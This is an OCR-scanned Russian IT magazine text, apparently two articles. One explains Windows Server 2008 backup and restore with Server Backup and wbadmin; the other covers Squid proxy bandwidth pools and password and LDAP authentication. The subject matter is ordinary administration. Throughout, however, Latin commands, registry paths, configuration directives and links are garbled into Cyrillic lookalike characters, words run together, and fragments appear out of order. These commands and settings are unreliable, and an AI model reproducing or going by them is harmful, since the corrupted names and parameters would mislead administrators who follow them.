позволит найти и устранить неполадки до того, как они смогут про- 



явить себя в полной мере. На этом этапе производится и резервное 
копирование. 

При наличии нескольких контроллеров домена следует выполнятьархи- 
вирование данных каждого. Нужнозаранее продумать свои действия по 
восстановлению работоспособности Ай. Нелишним будет проверить схему 
восстановления созданных резервных копий натестовом сервере или 
виртуальной машине. 

ИЗМЕНЕНИЯ ВѴѴІЫ2К8 

Начиная с версии ЫТ 3.5, для архивации и восстановления данных исполь- 
зоваласьутилита МТВаскир. В версии ѴѴІп2к она была интегрирована со 
службой РетоѵаЫе Зіогаде и планировщиком заданий, что позволяло 
автоматизировать процесс и упрощало работу администратору. Проблем с 
использованием КІТВаскир обычно не возникает. Настройки можно про- 
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Компонент «Архивирование данных ѴѴІпсІоѵѵз» сначала нужно установить 



данные, как это делается при дифференциальном копировании). Но такой 
подход не лишен недостатков. Теперь нельзя сохранить в резервную копию 
файл или каталог, в любом случае приходится копировать весьтом. Спаси- 
бо хоть, что нам под силу восстановить отдельный файл. 

Еще одноудобство состоит втом, что резервные копии хранятся в формате 
виртуального диска МісгозоЙ ѴЕЮ (Ѵігіиаі НагсІ Оізк), который исполь- 
зуется в МБ ѴігШі! РС 2004 и МБ Ѵігіиаі Зегѵег 2005. Такой образ можно 
подключить к работающей виртуальной машине и просто извлечь нужные 
файлы (загрузиться с него нельзя, так как комплектация оборудования не 
совпадает). 

В небольших и средних организациях редко встретишь стример. Да и 
резервные копии проще сохранить на сетевом ресурсе или жестком диске. 
Вероятно, это одна из причин, почему программа архивирования данных 
ѴѴІп2к8, в отличие от ЫТВаскир, не поддерживает сохранение данных на 
ленточные носители. Вернее, поддерживает, потребуются сторонние 
разработки. Зато с ее помощью очень легко записать копию данных на 



изводить как в графическом варианте, так и запускать в командной строке, 
передав все нужные параметры: 

> БТВАСКБР Ьаскир зузкетзкаке /к "Б: ХЪаскир . Ъкк " 

Впрочем, некоторые админы находят работу КІТВаскир непонятной и 
запутанной и предпочитают использовать для архивации софт сторонних 
разработчиков. Нотеперьо ІМТВаскир можнозабыть. В ѴѴі п2к8 ее заменила 
новая программа архивации данных, в которой используются совершенно 
иныетехнологии. 

Отличий столько, что новую программу даже нельзя назватьаналогом. 
Например, если ЫТВаскир работает на уровне файлов, то программа 
резервирования да иных ѴѴІ п2к8 опустилась ниже. Для архивирования 
используется служба ѴоІитеБНасіоѵѵ Сору Бегѵісе (Ѵ55), и источникданных 
воспринимается уже на уровнетомов и блоков. Такой метод обладает одним 
большим преимуществом — появилась возможность проводить какполное, 
так и дифференциальное резервное копирование, сохраняя только отличия. 
При помощи Бегѵег Васкир можно создавать полную копию сервера (все 
тома), отдельныхтомов и состояния системы. Таким образом, в случае краха 
можно быстро восстановить всю систему на новый жесткий диск. Кроме 
того, можно использовать резервную копию для восстановления и даже 
клонирования системы на сервер с аналогичным оборудованием. 

Также стало возможным создавать мгновенные снимки раздела, что 
упростит работу с несколькими копиями и сэкономит место на диске. На 
тех разделах, где хранятся резервные копии, программа архивирования 
задействует возможности службы теневого копирования, поэтому в мгно- 
венных снимках сохраняются только измененные блоки. Таким образом, 
если сохранить несколько полных копий раздела в один итотжетом, их 
суммарный размер будетна порядок меньше, чем ожидаемый. 

По умолчанию нельзя сохранять резервную копию на том же томе. Попы- 
тавшись, получим сообщение: «ЕККОК — ТЬе Іосаѣіоп Ьог Ьаскир 
із а сгіѣісаі ѵоіише». Хотя при желании ограничение можно обойти. 
Для этого запускаем программу гедесі И;, переходим в раздел нкеу_ьосаь_ 
МАСНІШ\ЗУ5ТЕМ\СиггепѣСопѣго18еѣ \8егѵісез\мЬепдіпе, 
создаем подключ ЗузѣетЗѣаѣеВаскир, а в нем параметр с именем 
АІІомЗЗВТоАпуѴоІите. Задаем тип параметра ШШД и чтобы разре- 
шить сохранение резервных копий в любом разделе, устанавливаем его 
значение в «1 ». 

Если при установке диск не разбивался на несколько разделов, это можно сде- 
лать при помощи инструментов «Диспетчера сервера». Заходим в «Накопители» 
(Біогаде) — «Упра вление дисками» ЮІБкМападетепі). Теперь выбираем раздел, 
размер котороготребуется уменьшить, и в контекстном меню — пунктБЬгіпк 
Ѵоіиппе. В появившемся окне будет выведена информация озанятом пространст- 
ве и предложенозначение, на которое можноуменышить размер раздела. 

Так каксистема воспринимает разностную копию как полную, восстановле- 
ние информации прозрачно (не нужно последовательно восстанавливать 



Создание бэкапов 
и восстановление 
в командной строке 

Некоторые операции проще и быстрее выполнять в командной 
строке при помощи утилиты ѵѵЪасІтіп. К тому же, создать резервную 
копию состояния системы можно только с ее помощью. Все доступ- 
ные параметры команды можно просмотреть, введя «мЬаЬтіп / ?». 
Подробное описание этой утилиты приведено на сайте МісгозоЙ 
Г ^о.ппсго$о1ьсотЛЫтк/?ЦпкШ=93131) . Для создания резервной 
копии системной области используется команда «ѵѵЪабтіп 5іаіТ 
зузіетзіаіеЪаскир» с указанием диска, на котором будет размещена 
резервная копия. Например: 

> ѵ/ЬасІтіп зкагк зузкетзкакеЪаскир -Ьаскиркагдек : Б : 

Вместо буквы раздела можно использовать его ОІІГО-обозначение. 
При необходимости в командной строке можно задать и периодич- 
ность выполнения задания. Например, чтобы сохранять важные 
системные области на диск Э: в 12 и 18 часов, пишем: 

> ѵ/ЬасІтіп епаЫе Ьаскир — аіісгікісаі — аскШагдек : Ь: 

— зскесіиіе : 12 : 00 , 18 : 00 

Чтобы отменить задание, используем команду «мЬаЬті п ЫзаЫе 
Ьаскир». Для восстановления перезагружаем контроллер домена в 
режим восстановления: 

> ЪсЬесіік /зек закеЬоок Ьзгераіг 

При восстановлении используется команда «р ѵЬаЬтіп зѣагѣ 

зуз ѣ етз ѣаѣ егесоѵегу», но параметров ей можно передать гораздо 

больше. Например, выполнив такую команду: 

> хѵЬаЬшіп зкагк зузкетзкакегесоѵегу - 
ѵегзіоп : 05/25/2008-19:20 -ЬаскирТагдек : \\ 
зегѵегпаше\зЬаге -тасМпе : зегѵег 

— мы восстановим архивную версию для машины зегѵег от 
05/25/2008 (узнать доступные, можно введя «мЬаЬтіп деѣ 
ѵегзіопз»), которая расположена на ресурсе \ \зегѵегпате\ 
зЬаге. Если восстановление производится на другую машину, то 
добавляем параметр « -гесоѵегуТагде I ». 
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За резервирование информации отвечает служба ѵѵЬепдіпе 




Все назначения на разделе будут уничтожены 

осуществляется с помощью соответствующего компонента в 
«Диспетчере сервера». Также в меню «Администрирование» 
появится ссылка на оснастку ММС. Вызвать мастер создания 
резервной копии можно и из пункта Свойства -> Инструменты 
выбранного раздела харда. Для работы в командной строке 
используй утилиту ѴѴЬа б тіп. Можно управлять как локальной, 
так и удаленной системой. 

НАСТРОЙКИ КОПИРОВАНИЯ ТОМОВ 

Итак, открываем консоль. Если требуется создать резервную 
копию раздела удаленной системы, подключаемся к ней, 
выбрав Асііоп -> Соппес* То АпоІНегСотріЛег. Далее вводим 
имя системы иучетныеданныедляуправления. 

Прежде чем бросаться в бой, познакомимся с еще одной 
важной настройкой, влияющей на производительность: Асііоп 
-> Соггіідиге Рег^огтапсеБеШпд («Настройка параметров 
производительности»]. В появившемся окне Оріітіге Васкир 
Регіогтапсе можно выбрать один изтрех вариантов исполь- 
зования службы теневого копирования томов. По умолчанию 
для всех дисков установлен режим полного копирования 
(Аіѵѵауз Регіогт йі|1 баски р) . Скорость создания резервной 
копии в этом случае невелика, но зато меньше интенсивность 
дисковых операций. При выборе инкрементного копирования 
(Аіѵѵауз Регіогт іпсгетепіаі баски р) увеличивается ско- 
ростьсоздания копии, а значит, и нагрузка на жесткий диск. 
Поэтому режим не рекомендуется для тех серверов, на которых 
установлены приложения, активно обращающиеся к НОО. 
Вариант Сизіот позволяет индивидуально выставить режим 
архивирования для каждого раздела — Ри II или Іпсгетепіаі. 

СОЗДАНИЕ РЕЗЕРВНОЙ КОПИИ 

С помощью компонента «Архивирование данных» можно 
создавать копии в двух режимах: запланированное копиро- 
вание и однократная операция. Выбираются они в подпунктах 
Васкир Бсбесіиіе и Васкир Опсе. Мастера, запускающиеся в 
обоих случаях, в общем-то, одинаковы и отличаются только 
парой пунктов. Рассмотрим работу мастера Васкир Бсбесіиіе 
ѴѴІгагсІ, при помощи которого создается расписание. 

На первом этапе выбираем один из вариантов архивации. 

Это можетбыть«Весьсервер» (ЕиІІБегѵег) —тогда архиви- 
руются все тома сервера — или Сизіогл. В последнем случае 
администратор указывает на нужные разделы. В варианте 
«Весь сервер» невозможно сохранить копию на жесткий диск, 
только на сетевой ресурс или 0Ѵ0. Зато в Сизіют, наоборот, 




> Ипкз 

• По адресу 
до.тісгозоіксот/ 
ІѵуІіпк/?1_ткІсІ=1 13147 
доступна бета-версия 
программы ЫТВаскир, 
позволяющая восста- 
новить бэкапы в Ѵізіа 
и ѴѴІп2к8, созданные 

в ранних версиях 
системы (в ѴѴіпХР и 
ѴѴі п 2 кЗ) . 

• Подробное опи- 
сание установки 
Бегѵег Васкир можно 
найти в документе 
«5іер-Ьу-5іер биібе 
бог ѴѴіпсІоѵѵз Бегѵег 
Васкир іп ѴѴіпсІоѵѵз 
Бегѵег 2008» по адре- 
су дотпісгазо|Есттт/ 
бѵѵіі пк/?ЫпкІсІ=1 13146 . 




> ѵѵагпіпд 

При сохранении 
копии на раздел 
жесткого диска этот 
раздел будет отфор- 
матирован, а все 
данные — уничтоже- 
ны. Также, в целях 
безопасности, раз- 
дел не будет виден в 
«Проводнике». 



ІІБВ-устройство или ОѴВ-диск. Важно помнить, что 
при копировании данных на сетевые ресурсы или 
ВѴО-диски программа архивации уже не сможет работать со 
службой теневого копирования, а значит, все преимущества 
такого взаимодействия отсутствуют. 

Размеры резервных копий в ѴѴІп2к8, по сравнению с ѴѴІп2кЗ, 
заметноувеличились. Например, при первом полном копиро- 
вании после установки системы было запрошено чуть больше 
7 Гб. Поэтому на ресурсах, куда будут сохраняться копии, 
должно быть достаточно свободного места. При планирова- 
нии операций архивирования на нескольких системахтакже 
следует учитывать увеличившееся время создания архивных 
копий, чтобы избежать перегрузки сети. 

Кстати, образы, созданные ІЧТВаскир, новая программа архи- 
вирования не понимает. 

УСТАН0ВКА5ЕКѴЕК ВАСКІІР 

Если зайти в меню «Архивирование данных ѴѴіпсІоѵѵз Бегѵег» 
(ѴѴіпсІоѵѵз Бегѵег Васкир) в «Диспетчере сервера» (Бегѵег 
Мападег) сразу после установки системы, то можно увидеть, 
чтооно неактивно. Поумолчанию компонент (ЕеаШгез) 

Бегѵег Васкир неустанавливается, но это легко сделать 
при помощи того же «Диспетчера сервера». Переходим в 
Ееаіигез, нажимаем ссылку АсИ Ееаіигез и выбираем в списке 
компонентов «Архивирование данных ѴѴіпсІоѵѵз Бегѵег». Про- 
грамма архивирования состоитиз двух частей: собственно, 
программы «Архивирование данных» и средств командной 
строки. Последние являются командлетами РоѵѵегБЬеІІ. Если 
РоѵѵегБЬеІІ в системе не установлен, последует запрос на 
инсталляцию. Чтобы установить Бегѵег Васкир в командной 
строке, достаточно ввести: 

С:\> зегѵегтападегстсі -іпзкаіі Васкир- 

Реакигез 

В варианте ѴѴі п2к8 Бегѵег Соге для установки используется 
команда осзеіир: 

С: \> осзекир ШіпсіоѵѵзЗегѵегВаскир 

Система резервного копирования в ѴѴІп2к8 построена на кли- 
ент-серверной архитектуре. Послеустановки в системе появ- 
ляется новая «Служба резервного копирования» (Віоск І_еѵеІ 
Васкир Епдіпе Бегѵісе, ѴѴВЕІЧ6ІЫЕ.ЕХЕ), которая и выполняет 
всю работу. Обрати внимание: ее запускустановлен в режим 
«Вручную» (Мапиаі). Управление режимами работы сервиса 
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нет возможности указать отличное от жестко го диска место 
хранения копии. Очевидно, это связано стем, что при работе 
по расписанию некому будет менять ОѴО-диски, или сетевой 
ресурс можетбыть недоступен. При ручной архивации в 
Васкир Опсе предлагаются все варианты. 

На следующем шаге выбираем периодичностьсоздания 
резервной копии. Копию можно создавать «Раз в день» (Опсе 
а сіау), указав в раскрывающемся списке время выполнения 
этого задания. В списке интервал указан с шагом 30 минут. Для 
важных серверов можно использовать вариант«Несколько раз 
вдень» (МогеіЬаі опсе а бау). В этом случае отмечаем время и 
переносим цифры в правую колонку при помощи кнопки АсИ. К 
сожалению, нет возможности назначить более гибкое расписа- 
ние, например, чтобы копии создавалисьтолько в рабочие дни 
(хотя можно прибегнуть куслугам планировщика заданий). 

Затем предлагается выбрать конечный носитель. В строке 
Ресоттепбеб сіізк зіге выдается рекомендуемый размер 
носителя. 

В режиме Васкир Опсе, в окне выбора источника, есть до- 
полнительный флажок«Включить восстановление системы» 
(ЕпаЫе зузіет гесоѵегу). Поумолчанию он активирован; в 
резервную копию будет включены: за грузочныйтом, том 
операционной системы и для контроллера домена —том с 
каталогом 5Ѵ5Ѵ0І_. 

Если предложенный диск не подходит, можно вывести весь 
список, нажав «Показать все доступные диски» (ЗЬоѵѵАІІ 
АѵаіІаЫе Оізк). 

Создавать копию на рабочемтоме нельзя. При выборе раздела 
жесткого диска появится предупреждение о том, что он будет 
отформатирован, а вся информация будетутеряна. Также в 
целях безопасности этот раздел не будет виден в «Проводни- 
ке». Сам процессформатирования и формирования задания 
начнется после нажатия на кнопку ЕіпізЬ. 

При повторном запуске мастера в режиме ВаскирЗсЬесіиІе 
будет предложено либо изменить текущее задание, либо ос- 
тановить задачу. В режиме Васкир Опсе можно сразу создать 
резервную копию с параметрами, указанными в активном 
задании (ТЬе за те орііопз ...), или со своими установками 
(Оіііегепі орііопз). 

Узнать, когда было выполнено или запланировано следую- 
щее задание, можно в окне консоли. Кроме этого, запись о 
проведенном копировании и его результат за носятся вжурнал 
Еѵепі Ѵіеѵѵег. Имеетсмысл указать в настройках, чтобы Еѵепі 
Ѵіеѵѵе г отправлял сообщение о важных событиях по электрон- 



ной почте. Для этого двойным щелчком выбираем событие, 
затем в появившемся окне в поле Асііопз нажимаем Аііасіі 
ТазкТоТЫз Еѵепіз. Далее — мастер нам в помощь. Натретьем 
шаге Асііоп отмечаем Зепсі апе-таіі — и в следующем окне 
заполняем данные для отправки сообщения. 

ВОССТАНОВЛЕНИЕ СИСТЕМЫ 

Мастер восстановления запускается из окна Зегѵег Васкир 
нажатием ссылки Песоѵег. Его работа напоминает Васкир 
ѴѴІ 2 агсІ, только здесь все наоборот. Сначала указываем, на 
какой компьютер будем восстанавливать данные, затем — дату 
создания резервной копии. Мастер предложит указатьтип 
восстановления: каталоги и файлы, приложения или том и, 
наконец, сам восстанавливаемый объект. При необходимости 
можно задать дополнительные параметры: восстановить 
объект в другое место, сохранить старые файлы ит.д. Все это 
выбирается на предпоследнем шаге. После подтверждения 
выбора мастер начнет работу. 

Программа архивирования поддерживает и автоматическое 
восстановление системы, для чего используется среда ѴѴІпРЕ 
(ѴѴІпсІоѵѵз Песоѵегу Епѵігоптепі). Поэтому, если система не 
загружается, следует использовать установочный диск, в 
меню которого выбрать пункт«Восстановление системы» 
(Пераігуоигсотриіег). После чего будет предложен о три 
варианта действий. Нас интересует «Полное восстановление 
компьютера ѴѴІпсІоѵѵз» (ѴѴІпсІоѵѵз Сотріеіе РС Пезіюге). Как 
вариант, можно загрузиться и восстановить систему в команд- 
ной строке. Далее ѴѴІпРЕ предложит выбрать резервную 
копию, из которой будет производиться восстановление. 

В списке появятся все копии, которые будут 
найдены на диске, но можноуказать и любой 
другой источник. При необходимости мастер 
восстановления позволит переразметить диск 
и отформатировать разделы. Подтверждаем 
свой выбор и ждем, пока закончится процесс 
восстановления. 

ЗАКЛЮЧЕНИЕ 

Несколько раз прогнав весь процесс, ты 
быстро освоишься с новыми функциями и 
настройками. Ничего сверхсложного здесь 
нет, поэтому проблем с восстановлением 
Ай иданныхна\А/іп2к8 у тебя, скорее всего, 
не будет. НЕ 




> ІП^О 

• Чтобы создавать 
резервную копию на 
любой раздел диска, 
заведи в реестре 
ключ НКЕУ_ЮСАЕ_ 
МАСНІІ\ІЕ\5У5ТЕМ\ 
СиггепіСопігоІЗеіЛ 
5егѵісез\ѵѵЬепдіпе\ 
ЗузіетЗіаіе Васкир 
с параметром 
АІІоѵѵЗЗВТоАпуѴоІите, 
типом ОѴѴОПО и значе- 
нием «1 ». 

• Изменить размер 
любого раздела можно 
в консоли «Управле- 
ние дисками» (Оізк 
Мападетепі). 

• Для удобства работы 
в Еѵепі Ѵіеѵѵег можно 
настроить отправ- 
ку е-таіі о важных 
событиях. 

Оптимизируем создание копий 
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ОШР: ОГРАНИЧИВАЕМ СКОРОСТЬ, АУТЕНТИФИЦИРУЕМ КЛИЕНТОВ И СМОТРИМ В ЛОГИ 



Возможностей у 3^шс1 столько, что разработчики часто даже не успевают 
их подробно описывать. Общая настройка, как правило, проблем не вызы- 
вает. Сложности начинаются, когда необходимо настроить ограничения на 
использование канала, организовать доступ к прокси при помощи внешних 
средств или выбрать программу для работы с журналами. 



ВСЕ ПОДЕЛИМ ПОРОВНУ 

Ситуация, когда один канал нужно справедливо разделить между пользовате- 
лями, отнюдь не редкость. В ЗциісІ регулировка пропускной способности кана- 
ла производится при помощи пулов. За настройки отвечает группа параметров 
«йеіау Рооіз». Большинство параметров этой секции требуют компиляции 
зцііісі сопцией - -епаЫе-сІеІау-рооІБ . Поумолчанию — таки есть. Узнать 
параметры сборки установленного ЗциісІ можно, введя команду здиісі -ѵ. 



Принцип ограничения скорости прост. Каждый запрашиваемый объект 
сначала попадает в буфер, а только затем передается клиенту. Каждый 
пул определяется двумя параметрами: скоростью заполнения и размером 
буфера. Если объем данных меньше размера буфера, то клиент получает их 
с максимальной скоростью, но при достижении лимита информация будет 
выдаваться в соответствии сустановками. По мере опустошения пула ЗциісІ 
будет получать остальную частьзапрашиваемой информации. 
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Теперь для доступа кЗциісІ нужно ввести пароль 




5АРѲ покажет все сайты, где побывал юзер 



Скорость заполнения пула зависит от класса. Для каждого пула при помощи 
де1ау_с1азз должен бытьустановлен один из пяти классов (до версии 2.6 
— один изтрех): 

1 — ограничения действительны для всех; 

2 — действуют общие ограничения, плюс индивидуальные ограничения 
для отдельных хостов (биты 25 — 32 сетевого адреса); 

3 — действуют общие ограничения, плюс индивидуальные ограничения для 
сетей (биты 17 — 24) и отдельных хостов (биты 17 — 32); 

4 — все, что определено в классеЗ, плюс введены ограничения для конк- 
ретного пользователя; 

5 — запросы группируются в соответствии с ихтегами, определенными при 
помощи ехІегпа1_ас1. 

Отсюда можно сделать вывод, что чем выше класс, тем через большее 
количество ограничений проходит соединение. Так, для четвертого класса 
сначала действуют общие ограничения, затем — ограничения подсети, 
отдельного узла и, наконец, для пользователя. Не стоит ожидать, что 
пользователь получит четко прописанную часть канала, если его подсеть 
выбрала свой лимит. 

Класс для пула задается при помощи параметра (1е1ау_с1азз , аргумен- 
тами которого являются номер пула и номер класса. Количество пулов 
задается параметром де1ау__роо1з. Например, создадим два пула и оп- 
ределим для каждого из них свой класс. Для этого прописываем в зци ісі . 
сопі следующие строки: 

йѵіт/еіс/зяиісі/зяиісі.соггі 

# Задаем списки доступа, по которым будем распределять 

юзеров по пулам 

асі оііісе зге 192.168.1.0/24 

асі о!1ісе2 зге 192.168.2.0/24 

асі изег зге 192.168.1.20/32 

асі Ьозз зге 192.168.1.12/32 

бе1ау_роо1з 2 # 2 пула 

бе1ау_с1азз 12 # пул 1, класс 2 

бе1ау_с1азз 2 3 # пул 2, класс 3 

Принадлежность пользователей к пулу задается при помощи Ье1ау_ 
ассезз. Его синтаксис напоминает Ъ.ѣѣр_ассезз\ 

бе1ау_ассезз рооі аііоѵ^/бепу АСЬ 

Поиск пула для конкретного адреса будет происходить только до перво- 



го совпадения, поэтому при объявлении пулов необходимо соблюдать 
нужный порядок. В одной строке следует использоватьтолько один АСб. 
Если прописать их несколько, в пул попадеттолько первый. Также, как и в 
Ыір_ассезз, чтобы в него не попал «лишний» адрес, каждый пул следует 
закрывать при помощи конструкции Ьепу аіі. 

Ье1ау_ассезз 1 аііом оТТісе 
Ье1ау_ассезз 1 аііом изег 
Ье1ау_ассезз 1 бепу аіі 
Ье1ау_ассезз 2 аііом о11ісе2 
Ье1ау_ассезз 2 аііоѵі Ьозз 
Ье1ау_ассезз 2 Ьепу аіі 

ЬЬЬр_ассезз аііотл оТТісе о11ісе2 Ьозз изег 
ЬЬЬр_ассезз Ьепу аіі 

В первый пул включены клиенты, описанные в АСбоЬЬісе и изег, во 
второй — оЬЫсе2 и Ьозз. Важно помнить, что АСЬ, неуказанные в 
де1ау_ассезз, будут выходить в Сеть без ограничений. При помощи 
Ьеіау _рагате1:егз задаем ограничения по скорости для каждого пула. В 
зависимости от класса пула количество аргументов будет различным. Для 
четвертого класса полный форматзаписи выглядиттак: 

Ье1ау_рагашеЬегз пул общий сеть индивидуальный_пользователь 

Соответственно, в третьем классе не используется последний аргумент, а 
во втором отсутствуют «сеть» и «пользователь». Количество пар должно 
соответствовать классу. Если что-то пропустить, сквид откажется работать. 
Ограничения на каждой из позиций состоят из пары скорость заполнения/ 
объем пула. Значения здесьуказываются в байтах, а скорость провайдеры 
считают в битах. В позициях, в которых нетограничений, устанавливаем -1: 

Ье1ау_рагашеЬегз 1 16000/16000 8000/8000 
Ье1ау_рагашеЬегз 2 32000/32000 -1/-1 16000/16000 

Для первого пула установлено общее ограничение в 1 28К и 64Кдля инди- 
видуального адреса. Для второго общее ограничение — 256 К; лимита на 
подсеть нет, но естьустановка для отдельного ІР-адреса. Для каждого пула 
должна быть только одна строка Ьеіау _рагатеѣегз. 

Используя различныетипы асі (смотри □Сза май этого года), можно ввести 
ограничения по времени, протоколам, типу файлов и др. Например, при 
помощи такой конструкции легко ограничить скорость любителям качать 
мультимедиа: 
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асі ІІ8ЕК8 ргоху_аиЫт КЕОІЛКЕБ 
Ы:кр_ассезз аііои ІІ8ЕК.8 
Ыс1ір_ассезз сіепу аіі 

аиЫт_рагат /изг/1іЪ/здиіс!/псза_аик]т /екс/ 

здиісі/развжі 

аиЫт_рагат скіісігеп 5 

аиЫт_рагат Ьазіс геаіт Здиісі ргоху-сасЫпд меЪ 
зегѵег 

аиЫг_рагат Ьазіс сгеЬепРіаІзЕІсІ 2 Ьоигз 

В первых трех строках объявлен новый асі и при помощи 
Ъѣѣр_ассезз разрешен доступ для всех клиентов, входя- 
щих в данный список. Значение кеошкер указы вает на 
то, что любой пользователь, прошедший аутентификацию, 
будет допущен. Как вариант, здесь можно прописать кон- 
кретные логины. В строке ниже указываем программу для 
аутентификации и расположение файла паролей. В разных 
дистрибутивах месторасположение псза_аиѣЪ. отличает- 
ся. Найти его просто: 

$ сіркд -іі здиісІЗ I дгер псза_аиДЬ 

Или — для РРМ: 




> \ПІО 

• В зависимости от 
версии Здиісі пара- 
метры и возможные 
значения могут отли- 
чаться. Для примера, 
в версии 2.6 в секции 
«йеіау Рооіз» исполь- 
зуется 50 параметров, 
а в новой 3.0 — только 
44 . 

• Чтобы узнать, с каки- 
ми параметрами соб- 
ран Здиісі, используй 
команду здиісі -ѵ. 

• В зависимости от 
назначения можно 
использовать один из 
пяти классов ограни- 
чений. 

• Для каждого пула 
должна быть задана 
только одна строка 

деіау _рагатеІегз. 



асі щиІЬішеЫа иг1раДЬ_гедех -і \ .трЗ$ \ .тред$ 
\ . аѵі$ 

с!е1ау_роо1з 3 
с!е1ау_с1азз 3 1 

сіе1ау_ассезз 3 аіісж тиііітеііа 
сіе1ау_ассезз 3 сіепу аіі 
сІе1ау_рагатекегз 3 8000/8000 

Теперь при закачке файловуказанныхтипов скорость выше 
64 кб ит п од н и маться н е будет. Аналогично уста н а вл и ва ются 
ограничения по времени. Например, чтобы уменьшить для 
всех пользователей скорость до 32 кбит в рабочее время, 
применяем правило: 

асі ѵ\Югк_Ьоигз кіше МТИТ Р 9 : 00-18 : 00 
с!е1ау_с1азз 4 2 

Ье1ау_ассезз 4 аііом ѵгогк_Ъ.оигз 
Ье1ау_ассезз 4 сіепу аіі 
сІе1ау_рагатекегз 4 -1/-1 4000/4000 

Таким же образом настраиваются ограничения по протоко- 
лам, адресам и другим типам АС б, поддерживаемым Здиісі. 
Но чтобы правила работали верно, их нужно распола- 
гать в том порядке, в котором они должны применяться. 
Например, если одним пользователям устанавливаются 
ограничения по адресу, а другим по времени, то сначала 
следует прописать пул для первых, а затем для вторых. Будь 
внимателен! 

АУТЕНТИФИКАЦИЯ В 5СШШ 

До этого момента списки доступа формировались на основе 
ІР-адреса компьютера или его принадлежности к неко- 
торой сети. Нередко возникает ситуация, когда за одним 
компьютером работают несколько человек, и необходимо 
предоставить доступ только после ввода логина и пароля. 
Здиісі поддерживает различные варианты аутентифика- 
ции. Чтобы обеспечить проверку «подлинности» клиентов, 
следует использоватьтип АС \_ргоху_аи1:Ъ и определить 
с помощью параметра аиѣЬ_рагат (ранее аиібеп1;іса1;е_ 
ргодгат) программу для аутентификации. 



# грш -ді здиісі I дгер пзса_аиЪ1т 

Параметр сЫЫгеп позволяетзадать максимальное 
количество процессов, используемых для аутентификации. 
Небольшое количество процессов может ее замедлить. Ис- 
пользуя геаіт, определим сообщениеЗциісІ, выводимое юзеру 
в окне ввода пароля. В принципе, текст здесь можно ввести 
и на русском, ното, какой будет выведен пользователю — за- 
висит от настроекбраузера. И, наконец, сгегіепіііаізііі 
указывает время кэширования пароля. 

Файл паролей создается при помощи утилиты Ыразвѵѵб, ко- 
торая входит в состав пакета АрасЬе. Создадим пользователя 
дгіпсіег: 

$ зисіо іікраззжі -с /еЬс/вдиісі/раззжі дгіпсіег 
Еехѵ раззѵгогсі: 

Ее-Ъуре пем раззѵгогсі: 

Асісііпд раззтлгогсі іог изег дгіпсіег 

Напомню, что ключ -с используется только однажды (для 
создания файла). В дальнейшем добавляем учетные записи 
с ключом -Ь. Для удобства пароль можноуказывать прямо в 
командной строке: 

$ зисіо іііраззжі -Ь /екс/здиісі/раззжі изег 
123456 

Перезапускать Здиісі при изменении списка пользователей не 
требуется. Чтобы никто другой не мог получить доступ к файлу 
паролей, следует установить соответствующие права: 

$ зисіо сктосі 440 /екс/здиісі/раззжі 
$ зисіо сіюѵт здиісі: здиісі /екс/здиісі/раззѵлі 

Пробуем подключиться к прокси-серверу. Чтобы не вводить 
каждый раз логин и пароль, их можно указать в настройках 
клиентского браузера. 

АУТЕНТИФИКАЦИЯ В АР С ЮАР 

При наличии Асііѵе Б і гесіо гу или сервера каталогов 
оптимальным вариантом будет использование единого 
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хранилища. При большом количестве пользователей такой вари- 
ант упрощает администрирование, — не нужно для каждого юзера 
создавать еще и учетную запись на прокси. Для работы с Ай есть две 
схемы: аутентификация с использованием КегЬегоз + ЗатЬа (ѵѵіпбіпб) 
или получение информации об учетных записях при помощи ЮАР. 
Первый вариант считается официальным и подробно расписан на 
сайте проекта [ ѵѵікі.вдиіб-сасЬе.огд/СопбдЕхатрІев/ѴѴІпсІоѵѵвАиіЬеп 
іісаііопІМТІ-М ]. Поэтому будем разбираться со вторым. Это несколько 
более универсальный способ, так как его можно использовать с любым 
ЮАР-сервером, вроде ОрепІЮАР. Для работы через ЮАР следует за- 
вести отдельную учетную запись (пусть это будет здиісіргоху). Причем, 
для Ай можно использовать учетную запись с минимумом привилегий. 
Домен для примера возьмем сіотаіп.сот . 

Для начала проверяем, видитли модуль здиісі_ІсІар_аиіЬ наш сервер: 

$ /изг/1іЬ/здиісіЗ/здиісі_1с1ар_аиЦЬ -ѵ 3 -Ь 

" сп= здиісіргоху , Ьс=с1отаіп, Ьс=сот" -і "иіс1=%з ,, 
сЗотаіп . сот 

В ответ на запрос вводим строку в виде — «пользователь пароль». 

Если получаем ОК, можно идти дальше. Вместо имени контроллера 
домена можно указать его ІР-адрес. Второй вариант проверки — с 
помощью утилиты поиска ІбарзеагсЬ, которая входит в пакет Шар-иіііз. 
При подключении к Ай можно использовать вместо «сп=здиісірг 
оху , дс=(іотаіп , сІс=сот» болееудобный вариант записи в виде 
здиісіргоху Ѳсіотаіп . сот. В АО имя учетной записи получается 
при помощи «зАМАссоипіМате=%з» > а в ИйАР используем «сп=%з». 
Других отличий нет. 

Если планируется аутентификация не только по пользователям, но и по 
группе, проверяем доступность групп: 

$ /изг/ІіЬ/здиісіЗ /здиісі_1с1ар_дгоир -Е -Ь 

" сісЮотаіп, с!с=сот" -і "(&(сп=%з) (тетЬегОР=сп=%з , 
сп=Бзегз, сіс=<іотаіп / с!с=сот) ) " 

-Б здиіЬргоху@с1отаіп . сот -ѵі пароль -Ь. сіотаіп.сот 

На запрос вводим строку — «логин группа». С помощью параметра -іѵ 
указывается пароль для доступа пользователя здиісіргоху к ЮАР- 
серверу. Переходим непосредственно к настройкам ЗдиісІ. Фактически, 
вконфиг-здиіЬ. сопЬ нужно внести всего две записи и установить 
разрешения: 



аиБЮрагат Ьазіс ргодгат /изг/ІіЬ/здиісіЗ /здиісі_1сіар_ 
аиДЬ -Е -Б здиісіргоху здиісіргоху@с1отаіп . сот — Ѵ7 пароль -Ь 
" сп= здиісіргоху , сіс=(іотаіп , Ьс=сот" -і " зАМАссоипРБате=%з " 
сіотаіп . сот 

# Если нужны разрешения на основании групп, то подключаем 
и внешнюю группу 

ехБегпа1_ас1_Ьуре 1сіар_дгоир %БОСІЫ /изг/ІіЬ/здиісіЗ/ 
здиісі_1сіар_дгоир -Е -Ь "сіс=с1отаіп, сіс=сот" -і " (&(сп=% 
ѵ) (тетЬегОі=сп=%а,сіс=сіотаіп / сіс=сот) ) " -Б здиісіргоху© 
сіотаіп.сот -V/ пароль сіотаіп.сот 

Форматэтих команд описан в документации к Здиісі. Здесьзадаем %ЬОСШ. 
Тогда пользователь перед проверкой на принадлежность к группе будет 
аутентифицирован. Некоторые ЮАР-сервера для передачи пароля ис- 
пользуютТІ_5. Чтобы подружиться с ними, достаточно добавить в команды 
параметр 

Теперь в здиісі. сопі: дописываем правила: 
